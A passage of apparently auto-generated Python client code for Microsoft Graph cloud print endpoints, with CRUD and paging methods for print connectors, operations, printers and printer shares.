'printConnector-id': self._serialize.url("print_connector_id", print_connector_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintConnector')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_connectors.metadata = {'url': '/print/connectors/{printConnector-id}'} # type: ignore
def delete_connectors(
self,
print_connector_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property connectors for print.
Delete navigation property connectors for print.
:param print_connector_id: key: id of printConnector.
:type print_connector_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_connectors.metadata['url'] # type: ignore
path_format_arguments = {
'printConnector-id': self._serialize.url("print_connector_id", print_connector_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_connectors.metadata = {'url': '/print/connectors/{printConnector-id}'} # type: ignore
def list_operations(
self,
orderby=None, # type: Optional[List[Union[str, "models.Enum29"]]]
select=None, # type: Optional[List[Union[str, "models.Enum30"]]]
expand=None, # type: Optional[List[str]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfPrintOperation"]
"""Get operations from print.
Get operations from print.
:param orderby: Order items by property values.
:type orderby: list[str or ~devices_cloud_print.models.Enum29]
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum30]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfPrintOperation or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrintOperation]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfPrintOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_operations.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfPrintOperation', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_operations.metadata = {'url': '/print/operations'} # type: ignore
def create_operations(
self,
body, # type: "models.MicrosoftGraphPrintOperation"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintOperation"
"""Create new navigation property to operations for print.
Create new navigation property to operations for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintOperation
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintOperation, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_operations.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintOperation')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_operations.metadata = {'url': '/print/operations'} # type: ignore
def get_operations(
self,
print_operation_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum31"]]]
expand=None, # type: Optional[List[str]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintOperation"
"""Get operations from print.
Get operations from print.
:param print_operation_id: key: id of printOperation.
:type print_operation_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum31]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintOperation, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_operations.metadata['url'] # type: ignore
path_format_arguments = {
'printOperation-id': self._serialize.url("print_operation_id", print_operation_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_operations.metadata = {'url': '/print/operations/{printOperation-id}'} # type: ignore
def update_operations(
self,
print_operation_id, # type: str
body, # type: "models.MicrosoftGraphPrintOperation"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property operations in print.
Update the navigation property operations in print.
:param print_operation_id: key: id of printOperation.
:type print_operation_id: str
:param body: New navigation property values.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintOperation
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_operations.metadata['url'] # type: ignore
path_format_arguments = {
'printOperation-id': self._serialize.url("print_operation_id", print_operation_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintOperation')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_operations.metadata = {'url': '/print/operations/{printOperation-id}'} # type: ignore
def delete_operations(
self,
print_operation_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property operations for print.
Delete navigation property operations for print.
:param print_operation_id: key: id of printOperation.
:type print_operation_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_operations.metadata['url'] # type: ignore
path_format_arguments = {
'printOperation-id': self._serialize.url("print_operation_id", print_operation_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_operations.metadata = {'url': '/print/operations/{printOperation-id}'} # type: ignore
def list_printers(
self,
orderby=None, # type: Optional[List[Union[str, "models.Enum32"]]]
select=None, # type: Optional[List[Union[str, "models.Enum33"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum34"]]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfPrinter"]
"""Get printers from print.
Get printers from print.
:param orderby: Order items by property values.
:type orderby: list[str or ~devices_cloud_print.models.Enum32]
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum33]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum34]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfPrinter or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrinter]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfPrinter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_printers.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfPrinter', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_printers.metadata = {'url': '/print/printers'} # type: ignore
def create_printers(
self,
body, # type: "models.MicrosoftGraphPrinter"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrinter"
"""Create new navigation property to printers for print.
Create new navigation property to printers for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrinter
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrinter, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrinter
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrinter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_printers.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrinter')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrinter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_printers.metadata = {'url': '/print/printers'} # type: ignore
def get_printers(
self,
printer_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum35"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum36"]]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrinter"
"""Get printers from print.
Get printers from print.
:param printer_id: key: id of printer.
:type printer_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum35]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum36]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrinter, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrinter
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrinter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_printers.metadata['url'] # type: ignore
path_format_arguments = {
'printer-id': self._serialize.url("printer_id", printer_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrinter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_printers.metadata = {'url': '/print/printers/{printer-id}'} # type: ignore
def update_printers(
self,
printer_id, # type: str
body, # type: "models.MicrosoftGraphPrinter"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property printers in print.
Update the navigation property printers in print.
:param printer_id: key: id of printer.
:type printer_id: str
:param body: New navigation property values.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrinter
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_printers.metadata['url'] # type: ignore
path_format_arguments = {
'printer-id': self._serialize.url("printer_id", printer_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrinter')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_printers.metadata = {'url': '/print/printers/{printer-id}'} # type: ignore
def delete_printers(
self,
printer_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property printers for print.
Delete navigation property printers for print.
:param printer_id: key: id of printer.
:type printer_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_printers.metadata['url'] # type: ignore
path_format_arguments = {
'printer-id': self._serialize.url("printer_id", printer_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_printers.metadata = {'url': '/print/printers/{printer-id}'} # type: ignore
def list_printer_shares(
self,
orderby=None, # type: Optional[List[Union[str, "models.Enum59"]]]
select=None, # type: Optional[List[Union[str, "models.Enum60"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum61"]]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfPrinterShare0"]
"""Get printerShares from print.
Get printerShares from print.
:param orderby: Order items by property values.
:type orderby: list[str or ~devices_cloud_print.models.Enum59]
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum60]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum61]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfPrinterShare0 or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrinterShare0]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfPrinterShare0"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_printer_shares.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfPrinterShare0', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_printer_shares.metadata = {'url': '/print/printerShares'} # type: ignore
def create_printer_shares(
self,
body, # type: "models.MicrosoftGraphPrinterShare"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrinterShare"
"""Create new navigation property to printerShares for print.
Create new navigation property to printerShares for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrinterShare, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrinterShare"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_printer_shares.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrinterShare')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrinterShare', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_printer_shares.metadata = {'url': '/print/printerShares'} # type: ignore
def get_printer_shares(
self,
printer_share_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum62"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum63"]]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrinterShare"
"""Get printerShares from print.
Get printerShares from print.
:param printer_share_id: key: id of printerShare.
:type printer_share_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum62]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum63]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrinterShare, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrinterShare"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_printer_shares.metadata['url'] # type: ignore
path_format_arguments = {
'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrinterShare', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_printer_shares.metadata = {'url': '/print/printerShares/{printerShare-id}'} # type: ignore
def update_printer_shares(
self,
printer_share_id, # type: str
body, # type: "models.MicrosoftGraphPrinterShare"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property printerShares in print.
Update the navigation property printerShares in print.
:param printer_share_id: key: id of printerShare.
:type printer_share_id: str
:param body: New navigation property values.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
